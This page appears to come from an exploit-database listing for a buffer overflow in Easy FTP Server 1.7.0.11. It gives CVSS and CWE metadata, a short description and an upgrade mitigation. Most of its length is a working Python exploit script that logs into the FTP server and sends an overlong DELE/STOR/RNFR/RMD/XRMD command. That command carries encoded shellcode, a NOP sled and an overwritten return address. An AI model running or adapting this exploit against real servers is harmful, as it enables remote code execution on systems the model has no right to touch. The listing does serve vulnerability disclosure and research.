Easy FTP Server v1.7.0.11 Multiple Command Buffer Overflow

vendor:

Easy FTP Server

by:

Glafkos Charalambous

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Easy FTP Server

Affected Version From: 1.7.0.11

Affected Version To: 1.7.0.11

Patch Exists: YES

Related CWE: N/A

CPE: a:easyftpsvr:easy_ftp_server:1.7.0.11

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3 En

2010

Easy FTP Server v1.7.0.11 Multiple Command Buffer Overflow

A buffer overflow vulnerability exists in Easy FTP Server v1.7.0.11 when handling specially crafted commands such as DELE, STOR, RNFR, RMD, and XRMD. An attacker can exploit this vulnerability by sending a specially crafted command with a payload of 268 bytes or more. This will overwrite the EIP register and allow the attacker to execute arbitrary code.

Mitigation:

Upgrade to the latest version of Easy FTP Server.

Source

Exploit-DB raw data:

# Exploit Title: Easy FTP Server v1.7.0.11 Multiple Command Buffer Overflow
# Date: August 12, 2010
# Author: Glafkos Charalambous
# Software Link: http://easyftpsvr.googlecode.com/files/easyftp-server-1.7.0.11-en.zip
# Version: 1.7.0.11
# Tested on: Windows XP SP3 En
# Vulnerable Commands: DELE, STOR, RNFR, RMD, XRMD

import socket
import sys

if len(sys.argv) != 4:
    print "Usage: ./easyftp.py <Target IP> <Port> <Command>"
    print "Vulnerable Commands: DELE, STOR, RNFR, RMD, XRMD"
    sys.exit(1)
  
target = sys.argv[1]
port = int(sys.argv[2])
command = sys.argv[3]

buffersize = 268
 

# windows/exec - 227 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe

shellcode = ("\xd9\xec\xba\x4c\x61\x82\xbc\xd9\x74\x24\xf4\x33\xc9\xb1\x33"
"\x58\x31\x50\x17\x83\xe8\xfc\x03\x1c\x72\x60\x49\x60\x9c\xed"
"\xb2\x98\x5d\x8e\x3b\x7d\x6c\x9c\x58\xf6\xdd\x10\x2a\x5a\xee"
"\xdb\x7e\x4e\x65\xa9\x56\x61\xce\x04\x81\x4c\xcf\xa8\x0d\x02"
"\x13\xaa\xf1\x58\x40\x0c\xcb\x93\x95\x4d\x0c\xc9\x56\x1f\xc5"
"\x86\xc5\xb0\x62\xda\xd5\xb1\xa4\x51\x65\xca\xc1\xa5\x12\x60"
"\xcb\xf5\x8b\xff\x83\xed\xa0\x58\x34\x0c\x64\xbb\x08\x47\x01"
"\x08\xfa\x56\xc3\x40\x03\x69\x2b\x0e\x3a\x46\xa6\x4e\x7a\x60"
"\x59\x25\x70\x93\xe4\x3e\x43\xee\x32\xca\x56\x48\xb0\x6c\xb3"
"\x69\x15\xea\x30\x65\xd2\x78\x1e\x69\xe5\xad\x14\x95\x6e\x50"
"\xfb\x1c\x34\x77\xdf\x45\xee\x16\x46\x23\x41\x26\x98\x8b\x3e"
"\x82\xd2\x39\x2a\xb4\xb8\x57\xad\x34\xc7\x1e\xad\x46\xc8\x30"
"\xc6\x77\x43\xdf\x91\x87\x86\xa4\x6e\xc2\x8b\x8c\xe6\x8b\x59"
"\x8d\x6a\x2c\xb4\xd1\x92\xaf\x3d\xa9\x60\xaf\x37\xac\x2d\x77"
"\xab\xdc\x3e\x12\xcb\x73\x3e\x37\xa8\x12\xac\xdb\x01\xb1\x54"
"\x79\x5e")

 
eip = "\x91\xC8\x41\x7E"
nopsled = "\x90" * 16
junk = "\x90" * (buffersize-(len(nopsled)+len(shellcode)))
payload = nopsled+shellcode+junk+eip

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect = s.connect((target, port))
    print "[+] Connected"
except:
    print "[!] Connection Failed"
    sys.exit(0)
s.recv(1024)
 	
s.send('User ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
print "[+] Sending payload..."
s.send(command +' '+payload+'\r\n')
s.close()